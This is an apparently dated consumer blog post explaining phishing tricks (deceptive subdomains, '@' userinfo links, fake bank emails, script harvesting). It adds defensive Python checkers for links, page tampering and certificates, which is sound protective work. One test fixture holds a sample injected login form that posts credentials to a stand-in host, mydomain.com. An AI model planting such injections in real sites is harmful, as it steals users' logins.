Phishing: Basics of Phishing and Preventive Measures


Phishing is an activity through which phishers [attackers] attempt to obtain sensitive information such as your credit card details or the passwords of your mailbox or bank account by pretending to be a legitimate source.

Phishing can be both socially and technically engineered. A person pretending to be from your bank and asking for your account information for routine maintenance is an example of socially engineered phishing, whereas an email that appears to have come from your bank and asks you to log in to your banking account to keep it active is an example of technically engineered phishing. Such attempts to obtain your personal and confidential information are known as phishing attacks.

On average there are over 30,000 phishing attempts worldwide, and chances are that you too have received one of those emails from Nigeria or somewhere else asking for your help to transfer millions of dollars from their account to yours for some purpose.

Most common phishing techniques

Malformed URL/weblink - The simplest and most common phishing attempt is made through a malformed URL. At first glance the URL may appear legitimate, but a closer look will reveal that it actually reads http://www.your-bank.com.my-website.com [www.your-bank.com is a subdomain of my-website.com, and the page is served by whoever registered my-website.com]. It is very easy to create such subdomains yourself. People who are not so technical may not be able to tell a genuine URL from a malformed one and so often become victims of such phishing attempts. Another URL trick is to embed a link in an email whose text reads [www.your-bank.com] while the actual link is www.your-bank.com@mydomain.com. In a URL everything between the scheme and the @ is treated as a username, not as the host, so when you click this link you land on a page hosted on mydomain.com and not on www.your-bank.com! Take a closer look before you click on such embedded links. [Right click, select 'Copy Link Location' and paste it into Notepad to check it yourself; the host name is what comes after any @ and before the next /]
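The check described above [copy the link, find the real host] can be automated. The following Python script is an added example written for this page, not code from the original post; it uses only the standard library and treats the host names in the examples (your-bank.com, my-website.com, mydomain.com) as placeholders. It parses a link the way a browser does, strips the userinfo part before any @, compares the registered domain of the real host against the bank's domain, and flags link text that shows one host while the link goes to another. The registered-domain helper is a simplification (last two labels); country-code suffixes such as .co.uk would need the Public Suffix List.

```python
from urllib.parse import urlsplit


def real_host(url: str) -> str:
    """Host a browser would actually connect to for this URL.

    Anything between '//' and '@' is userinfo (a username), not the host,
    which is exactly what the www.your-bank.com@mydomain.com trick relies on.
    """
    if "://" not in url:
        url = "http://" + url            # bare links such as www.your-bank.com
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def registered_domain(host: str) -> str:
    """Last two labels of the host: the part somebody had to register.

    Simplification: suffixes such as .co.uk need the Public Suffix List;
    good enough for the .com style hosts used on this page.
    """
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def same_site(url: str, legit_domain: str) -> bool:
    """True if the link really lands on the bank's registered domain."""
    return registered_domain(real_host(url)) == registered_domain(legit_domain.lower())


def check_link(link_text: str, href: str, legit_domain: str) -> list[str]:
    """Warnings for one link from an email: its visible text plus its href."""
    warnings = []
    host = real_host(href)
    netloc = urlsplit(href if "://" in href else "http://" + href).netloc
    if "@" in netloc:
        warnings.append(f"userinfo trick: the real host is {host}")
    if not same_site(href, legit_domain):
        warnings.append(f"link leads to {registered_domain(host)}, not {legit_domain}")
    # Link text that looks like a host name but points somewhere else.
    looks_like_host = "." in link_text and " " not in link_text
    if looks_like_host and real_host(link_text) != host:
        warnings.append(f"text shows {real_host(link_text)} but the link goes to {host}")
    return warnings


if __name__ == "__main__":
    # Constructed examples using the placeholder hosts named on this page.
    samples = [
        ("www.your-bank.com", "http://www.your-bank.com@mydomain.com", "your-bank.com"),
        ("www.your-bank.com", "http://www.your-bank.com.my-website.com/login", "your-bank.com"),
        ("Log in", "https://online.your-bank.com/login", "your-bank.com"),
    ]
    for text, href, legit in samples:
        print(href, "->", check_link(text, href, legit) or ["looks fine"])
```

The userinfo case produces three warnings, the subdomain case two, and the genuine link none; the first two are exactly the URLs the paragraph above describes.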

Email from your bank - Another common phishing attempt is to obtain your credit card information or the password of your bank account by means of an email. The email contains a message prompting you to click on a link which takes you to a page where you are asked to enter your credit card number, its security code and your name to keep your account in operation. After entering the required information you may see a "Thank you" message, but the information you entered has already been sent to an undisclosed mailbox from which the phisher/attacker collects it.

Script harvesting - This is rare but quite possible. An attacker gains access to the server hosting a website by compromising its security and places his own code in the website's pages. From then on, every user who logs in has their account details sent to a mailbox without their or the domain admin's knowledge. Such attacks are difficult to detect unless noticed by a user or the webmaster; the practical way to catch them is to keep a known-good copy of the pages off the server and compare the deployed pages against it regularly.
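As an added example for this page [not code from the original post], the Python script below shows the kind of check a webmaster can run against script harvesting. It keeps a SHA-256 baseline of the site's pages, reports any page whose content has changed, and scans a page for form actions and script or iframe sources that leave the site, which is the tell-tale of a login form rewritten to post credentials elsewhere. The site domain (your-bank.com), the attacker host (mydomain.com) and the two sample pages are constructed for the example.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit

SITE_DOMAIN = "your-bank.com"   # the site's own domain (name assumed for the example)

# Constructed sample pages: the login form as deployed, and the same page after an
# attacker has edited it so that credentials are posted to a host he controls.
CLEAN_LOGIN = (
    '<form action="/login" method="post">'
    '<input name="user"><input name="pass" type="password"></form>'
)
TAMPERED_LOGIN = (
    '<form action="http://mydomain.com/collect" method="post">'
    '<input name="user"><input name="pass" type="password"></form>'
    '<script src="http://mydomain.com/hook.js"></script>'
)


def fingerprint(pages: dict[str, str]) -> dict[str, str]:
    """SHA-256 of every page, keyed by path: the baseline to keep off the server."""
    return {path: hashlib.sha256(body.encode()).hexdigest() for path, body in pages.items()}


def changed_pages(baseline: dict[str, str], pages: dict[str, str]) -> list[str]:
    """Paths whose content differs from the baseline (added, removed or edited)."""
    current = fingerprint(pages)
    return sorted(p for p in set(baseline) | set(current) if baseline.get(p) != current.get(p))


class _OffSiteFinder(HTMLParser):
    """Collects form actions and script/iframe sources that leave the site."""

    def __init__(self, site: str):
        super().__init__()
        self.site = site
        self.hits: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            target = a.get("action")
        elif tag in ("script", "iframe"):
            target = a.get("src")
        else:
            return
        host = (urlsplit(target or "").hostname or "").lower()
        # Relative URLs have no host and stay on the site; anything else must be
        # the site itself or one of its subdomains.
        if host and host != self.site and not host.endswith("." + self.site):
            self.hits.append((tag, target))


def off_site_references(html: str, site: str = SITE_DOMAIN) -> list[tuple[str, str]]:
    """(tag, url) pairs in the page that send data or load code from another site."""
    finder = _OffSiteFinder(site)
    finder.feed(html)
    return finder.hits


if __name__ == "__main__":
    baseline = fingerprint({"login.html": CLEAN_LOGIN})
    print("changed:", changed_pages(baseline, {"login.html": TAMPERED_LOGIN}))
    print("off-site:", off_site_references(TAMPERED_LOGIN))
```

The baseline has to live somewhere the attacker cannot edit along with the pages, otherwise he simply re-fingerprints his modified copy. The off-site scan is deliberately strict: a site that legitimately loads scripts from a third party will need those hosts added to the allowed list.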

Preventive Measures

A little knowledge about such phishing attempts [you have it now ;)] and upgrading your browser to the latest version [at the time of writing IE 7 and Firefox 2.0], which has phishing detection [Anti-Phishing] built in, can prevent you from becoming another victim of phishing attacks. Alternatively, you can download the Anti-Phishing toolbar from Netcraft and install it in your browser. It shows you a risk rating of a website when you access it and helps you detect phishing attempts.

If you receive an email from your bank that looks suspicious, contact your bank immediately by calling their office number [the one printed on your card or statement, not a number given in the email] and seek their advice. When you shop online, look for https:// and the padlock in the address bar of the browser [your information must be encrypted before it is transmitted over the web]. Note that https:// on its own only tells you that the connection is encrypted to whoever runs that site; a phisher can obtain a certificate for a domain he owns, so also check that the certificate was issued to the domain you intended to visit.
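What the browser compares behind the padlock is the host name you typed against the names in the server's certificate. The Python script below is an added example for this page [not code from the original post] that performs that comparison on a certificate dictionary in the shape returned by Python's ssl module; the sample certificate for www.your-bank.com is constructed for the example and the fetch function, which needs network access, is included only to show where a real certificate would come from.

```python
import socket
import ssl

# Constructed certificate in the shape ssl's getpeercert() returns, standing in
# for the certificate a real bank site would present.
SAMPLE_CERT = {
    "subject": ((("commonName", "www.your-bank.com"),),),
    "subjectAltName": (("DNS", "www.your-bank.com"), ("DNS", "*.your-bank.com")),
}


def cert_names(cert: dict) -> list[str]:
    """DNS names the certificate was issued for (SAN entries, CN as a fallback)."""
    names = [value.lower() for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not names:
        for rdn in cert.get("subject", ()):
            names += [value.lower() for key, value in rdn if key == "commonName"]
    return names


def name_matches(pattern: str, host: str) -> bool:
    """One certificate name against one host; '*' covers a single leftmost label."""
    pattern, host = pattern.lower(), host.lower()
    if pattern.startswith("*."):
        return host.endswith(pattern[1:]) and host.count(".") == pattern.count(".")
    return pattern == host


def cert_matches_host(cert: dict, host: str) -> bool:
    """True only if the host you typed is one the certificate was issued for."""
    return any(name_matches(name, host) for name in cert_names(cert))


def fetch_cert(host: str, port: int = 443) -> dict:
    """Connect over TLS and return the server certificate (network access needed).

    create_default_context() already verifies the chain and the host name, so a
    phishing host presenting somebody else's certificate fails here with
    ssl.SSLCertVerificationError before any data is sent.
    """
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    for host in ("www.your-bank.com", "online.your-bank.com",
                 "www.your-bank.com.my-website.com", "mydomain.com"):
        print(host, "->", cert_matches_host(SAMPLE_CERT, host))
```

The two phishing hosts from the first section fail the match even though they contain the bank's name: the wildcard covers only one label, and a suffix of a different registered domain is not the bank's domain at all. A certificate that does match a phishing host is still possible [the phisher simply buys one for my-website.com], which is why the check must be against the domain you meant to visit, not merely that some certificate exists.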

Follow the simple tips mentioned above to protect yourself from the most common phishing attacks.

More information on Phishing @ [http://en.wikipedia.org/wiki/Phishing]

